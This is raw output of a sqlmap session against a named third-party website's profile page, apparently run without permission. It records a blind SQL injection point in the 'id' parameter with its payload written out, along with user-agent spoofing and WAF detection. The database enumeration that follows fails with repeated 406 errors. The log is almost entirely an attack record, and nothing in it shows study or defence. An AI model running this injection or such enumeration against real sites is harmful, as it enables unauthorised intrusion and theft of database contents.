http://www.ninjaevolution.net/ben/profile.php?section=personality&id=248120
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.8.13#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:38:57 /2019-08-30/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[15:38:57] [INFO] fetched random HTTP User-Agent header value 'Opera/9.61 (Windows NT 6.0; U; ru) Presto/2.1.1' from file '/root/sqlmap/data/txt/user-agents.txt'
[15:38:58] [INFO] resuming back-end DBMS 'mysql' 
[15:38:59] [INFO] testing connection to the target URL
[15:38:59] [WARNING] potential permission problems detected ('Access denied')
[15:38:59] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: id=-1864) OR MAKE_SET(9731=9731,9992)-- Mpfo
---
[15:38:59] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL unknown
[15:38:59] [INFO] fetching database names
[15:38:59] [INFO] fetching number of databases
[15:39:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:39:00] [INFO] retrieved: 
[15:39:01] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:39:01] [ERROR] unable to retrieve the number of databases
[15:39:01] [INFO] falling back to current database
[15:39:01] [INFO] fetching current database
[15:39:01] [INFO] retrieved: 
[15:39:27] [CRITICAL] unable to retrieve the database names
[15:39:27] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 129 times
[15:39:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.ninjaevolution.net'

[*] ending @ 15:39:27 /2019-08-30/

